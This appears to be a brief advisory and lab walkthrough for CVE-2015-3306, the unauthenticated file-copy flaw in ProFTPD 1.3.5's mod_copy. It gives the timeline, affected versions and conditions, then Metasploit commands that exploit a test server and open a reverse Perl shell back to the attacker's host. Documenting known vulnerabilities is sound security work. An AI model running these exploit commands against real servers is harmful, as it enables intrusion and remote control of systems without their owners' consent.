CVE-2015-3306 ProFTPD 1.3.5 Mod_Copy Command Execution

Timeline :

Vulnerability discovered and reported to the vendor by Vadim Melihow the 2015-04-07
Workaround provided by the vendor the 2015-04-07
Vulnerability details released the 2015-04-13
Metasploit PoC provided the 2015-04-22
Patch provided by the vendor the 2015-05-28

PoC provided by :

Vadim Melihow
xistence

Reference(s) :

CVE-2015-3306

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

Centos 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the ‘nobody’ user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

This vulnerability is only triggered in particular conditions:
– ProFTPD need to have the rights to write into a web accessible folder having the privileges of ProFTPD.
– SELinux must be disabled

Commands :

ProFTPD is running with user and group “nobody”
ProFTPD is configured with “LoadModule mod_copy.c” in proftpd.conf file
A “test” folder has been created in “/var/www/html/“ with nodody:nobody privileges

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run

id

Done !